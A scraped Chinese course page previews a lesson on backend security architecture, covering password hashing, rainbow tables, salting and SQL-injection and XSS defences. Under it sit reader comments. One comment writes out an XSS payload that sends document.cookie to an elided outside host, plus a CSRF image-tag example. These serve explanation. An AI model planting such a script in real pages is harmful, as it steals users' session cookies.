后端技术面试 38 讲
李智慧
同程艺龙交通首席架构师,前 Intel& 阿里架构师,《大型网站技术架构》作者
37373 人已学习
新⼈⾸单¥59
登录后,你可以任选4讲全文学习
推荐试读
换一换
课程目录
已完结/共 46 讲
开篇词 (1讲)
开篇词 | 掌握软件开发技术的第一性原理
时长 10:27
软件的基础原理 (8讲)
01丨程序运行原理:程序是如何运行又是如何崩溃的?
时长 12:56
02丨数据结构原理:Hash表的时间复杂度为什么是O(1)?
时长 12:55
03丨Java虚拟机原理:JVM为什么被称为机器(machine)?
时长 15:31
04丨网络编程原理:一个字符的互联网之旅
时长 17:39
05丨文件系统原理:如何用1分钟遍历一个100TB的文件?
时长 13:25
06丨数据库原理:为什么PrepareStatement性能更好更安全?
时长 11:19
07丨编程语言原理:面向对象编程是编程的终极形态吗?
时长 13:05
答疑丨Java Web程序的运行时环境到底是怎样的?
时长 10:20
软件的设计原理 (14讲)
08丨软件设计的方法论:软件为什么要建模?
时长 11:28
09丨软件设计实践:如何使用UML完成一个设计文档?
时长 10:58
10 | 软件设计的目的:糟糕的程序员比优秀的程序员差在哪里?
时长 10:03
11丨软件设计的开闭原则:如何不修改代码却能实现需求变更?
时长 12:22
12 | 软件设计的依赖倒置原则:如何不依赖代码却可以复用它的功能?
时长 11:37
13丨软件设计的里氏替换原则:正方形可以继承长方形吗?
时长 11:05
14 | 软件设计的单一职责原则:为什么说一个类文件打开最好不要超过一屏?
时长 09:58
15丨软件设计的接口隔离原则:如何对类的调用者隐藏类的公有方法?
时长 09:49
16 | 设计模式基础:不会灵活应用设计模式,你就没有掌握面向对象编程
时长 11:07
17 | 设计模式应用:编程框架中的设计模式
时长 13:01
18 | 反应式编程框架设计:如何使程序调用不阻塞等待,立即响应?
时长 12:02
19 | 组件设计原则:组件的边界在哪里?
时长 10:30
20 | 领域驱动设计:35岁的程序员应该写什么样的代码?
时长 12:28
答疑丨对于设计模式而言,场景到底有多重要?
时长 08:43
架构的核心原理 (14讲)
21丨分布式架构:如何应对高并发的用户请求
时长 11:23
22 | 缓存架构:如何减少不必要的计算?
时长 11:27
23 | 异步架构:如何避免互相依赖的系统间耦合?
时长 11:44
24 | 负载均衡架构:如何用10行代码实现一个负载均衡服务?
时长 10:16
25 | 数据存储架构:如何改善系统的数据存储能力?
时长 12:09
26 | 搜索引擎架构:如何瞬间完成海量数据检索?
时长 10:18
27 | 微服务架构:微服务究竟是灵丹还是毒药?
时长 10:33
28 | 高性能架构:除了代码,你还可以在哪些地方优化性能?
时长 12:23
29 | 高可用架构:我们为什么感觉不到淘宝应用升级时的停机?
时长 13:27
30 | 安全性架构:为什么说用户密码泄漏是程序员的锅?
时长 09:43
31 | 大数据架构:大数据技术架构的思想和原理是什么?
时长 12:54
32 | AI与物联网架构:从智能引擎到物联网平台
时长 10:47
33 | 区块链技术架构:区块链到底能做什么?
时长 13:45
答疑丨互联网需要解决的技术问题是什么?
时长 12:30
技术人的思维修炼 (6讲)
34 | 技术修炼之道:同样工作十几年,为什么有的人成为大厂架构师,有的人失业?
时长 11:31
35 | 技术进阶之道:你和这个星球最顶级的程序员差几个等级?
时长 10:18
36丨技术落地之道:你真的知道自己要解决的问题是什么吗?
时长 09:56
37丨技术沟通之道:如何解决问题?
时长 10:04
38丨技术管理之道:你真的要转管理吗?
时长 10:22
答疑丨工作中的交往和沟通,都有哪些小技巧呢?
时长 10:18
不定期加餐 (1讲)
加餐 | 软件设计文档示例模板
时长 02:10
结束语 (1讲)
结束语丨期待未来的你,成为优秀的软件架构师
时长 03:48
期末考试 (1讲)
期末测试丨快来测测你对专栏内容掌握到何种程度了
时长 00:39
后端技术面试 38 讲
15
15
1.0x
00:00/00:00
登录|注册

30 | 安全性架构:为什么说用户密码泄漏是程序员的锅?

李智慧
消毒
预编译
数字签名
HTTPS
加盐
Web应用防火墙
XSS攻击
SQL注入攻击
非对称加密
对称加密
单向散列加密
HTTP攻击与防护
数据加解密
用户密码泄露责任
对应的防护手段
常见的HTTP攻击方式
软件安全性架构
思考题
系统安全

该思维导图由 AI 生成,仅供参考

系统安全是一个老生常谈又容易被忽视的问题,往往只有在系统被攻击了,数据泄漏了,才会关注软件安全问题。互联网应用因为要向全球用户提供服务,在任何地方都可以访问互联网应用,任何恶意的用户可以在世界任何地方对互联网系统发起攻击,因此互联网系统又具有天然的脆弱性。
在互联网各种安全问题中,最能引发话题,刺激大众神经的就是用户密码泄露。数据库被拖库,导致所有的数据泄露,这种系统安全问题涉及的因素可能有很多,大部分都和开发软件的程序员没有关系。但是因为数据库被拖库,黑客直接获得了用户密码等敏感信息,导致用户密码泄露就是程序员的责任了。

数据加解密

通过对用户密码、身份证号、银行卡号等敏感数据加密,保护数据安全,是软件安全性架构的一部分,是程序员和架构师的责任。
软件开发过程中,主要使用的加密方法有三种:单向散列加密、对称加密和非对称加密。
用户密码加密通常使用的是单向散列加密。所谓的单向散列加密是指对一串明文信息进行散列(hash)加密,得到的密文信息是不可以被解密的,也就是说给定一个密文,即使是加密者也无法知道它的明文是什么的,加密是单向的,不支持解密。
单向散列加密事实上是一种 hash 算法。我们熟悉的 MD5 算法就是一种单向散列加密算法,单向散列算法虽然无法通过对密文进行解密计算,还原得到原始明文。但是,如果知道了算法,就可以通过彩虹表的方法进行破解。彩虹表是常用明文和密文的映射表,很多人喜欢用生日做密码,其实生日的组合是非常有限的,轻易就可以建一个生日和密文的映射表。如果黑客得到了密文,可以通过查表的办法得到密码明文。
确认放弃笔记?
放弃后所记笔记将不保留。
新功能上线,你的历史笔记已初始化为私密笔记,是否一键批量公开?
批量公开的笔记不会为你同步至部落
公开
同步至部落
取消
完成
0/2000
荧光笔
直线
曲线
笔记
复制
AI
  • 深入了解
  • 翻译
    • 英语
    • 中文简体
    • 中文繁体
    • 法语
    • 德语
    • 日语
    • 韩语
    • 俄语
    • 西班牙语
    • 阿拉伯语
  • 解释
  • 总结

程序员在软件开发中需要关注用户密码泄露问题,因为数据库被拖库导致用户密码泄露会成为程序员的责任。数据加解密是保护数据安全的重要手段,包括单向散列加密、对称加密和非对称加密。单向散列加密常用于用户密码加密,需要注意加盐以增加破解难度。对称加密用于加密敏感信息,而非对称加密常用于HTTPS通信和数字签名。此外,文章还介绍了HTTP攻击中的SQL注入和XSS攻击,以及相应的防御手段。对于SQL注入,建议使用SQL预编译进行防御,而对XSS攻击则需要进行消毒处理和设置Web应用防火墙。文章内容涵盖了密码加密、数据安全和HTTP攻击防护等技术特点,对程序员和架构师具有一定的参考意义。文章强调了硬件指令和操作系统可能存在的漏洞,以及各种框架和SDK可能的漏洞,并提出了加强数据加密存储与传输、加强请求的合法性检查、及时更新软件版本修复安全漏洞等防护措施。总之,通过本文的阐述,读者可以了解到密码加密、数据安全和HTTP攻击防护等技术特点,以及相应的防护措施,为构建相对安全的生产环境提供了有益的参考。

仅可试看部分内容,如需阅读全部内容,请付费购买文章所属专栏
《后端技术面试 38 讲》新⼈⾸单¥59
立即购买
© 版权归极客邦科技所有,未经许可不得传播售卖。 页面已增加防盗追踪,如有侵权极客邦将依法追究其法律责任。
09丨软件设计实践:如何使用UML完成一个设计文档?
加餐 | 软件设计文档示例模板
12 | 软件设计的依赖倒置原则:如何不依赖代码却可以复用它的功能?
13丨软件设计的里氏替换原则:正方形可以继承长方形吗?
18 | 反应式编程框架设计:如何使程序调用不阻塞等待,立即响应?
19 | 组件设计原则:组件的边界在哪里?
登录 后留言

全部留言(11)

  • 最新
  • 精选
  • escray
    使用用户的 ID 作为盐确实是一个好主意,按照这个思路,也可以用用户创建的日期来作为盐。 常见的 Web 攻击方式,除了 SQL 注入,XSS, Cross Site Script 跨站脚本攻击,还有 CSRF, Cross-Site Request Forgery 跨站请求伪造,而专栏文中的例子其实更像是 CSRF 攻击。 XSS 攻击的例子: 评论内容上半部分 <script> var script =document.createElement('script'); script.src='http://...?cookie=' + document.cookie; document.body.appendChild(script); </script> 评论内容下半部分 CSRF 攻击的例子: 评论内容 1 <img src="/logout"> 评论内容 2 体会一下。 XSS 是劫持了某个身份,而 CSRF 是假冒了某个身份。 例子来源于《全栈工程师修炼指南》专栏里面的《31 | 防人之心不可无:网站安全问题窥视》 Web 攻击(也可以称之为 HTTP 攻击)还要再加上 HTTP 劫持、 DNS 劫持和 DDoS, Distributed Denial-of-Service 攻击。 作为程序员确实需要了解一些安全常识,以免背锅。
    2020-10-14
    9
  • a、
    crsf(跨站请求伪造)攻击,解决办法是每次请求服务器,服务器都返回一个token,用户端下次请求要带着这个token去请求,服务器校验token是否有效
    2020-02-03
    4
  • 学习学个屁
    伪造cookie ,解决办法使用token请求
    2020-04-02
    2
  • 千米完结
    感觉还有一种攻击 就是别人盗取了账号密码 但是 登录的时候 需要校验常用地 常用手机 常用浏览器等 然后 短信或者邮箱验证码登录 可以解决
    2020-04-01
    2
  • Geek_972ce9
    syn泛洪攻击
    2023-03-19归属地:广东
  • test
    XSS, Cross Site Script。CSRF, Cross-Site Request Forgery 、
    2022-11-06归属地:广东
  • test
    XSS 是劫持了某个身份,而 CSRF 是假冒了某个身份。
    2022-11-06归属地:广东
  • ꧁༺༻꧂
    中间人
    2022-09-25归属地:四川
  • Snooker
    ssrf 攻击,好像又称内网穿透,对其攻击原理不是很理解,老师可以帮忙深入讲一下攻击原理和防护措施吗?
    2020-07-05
  • hex
    并发提交某请求。解决使用传token检验或者redis锁
    2020-02-14
收起评论
显示
设置
留言
11
收藏
沉浸
阅读
分享
手机端
快捷键
回顶部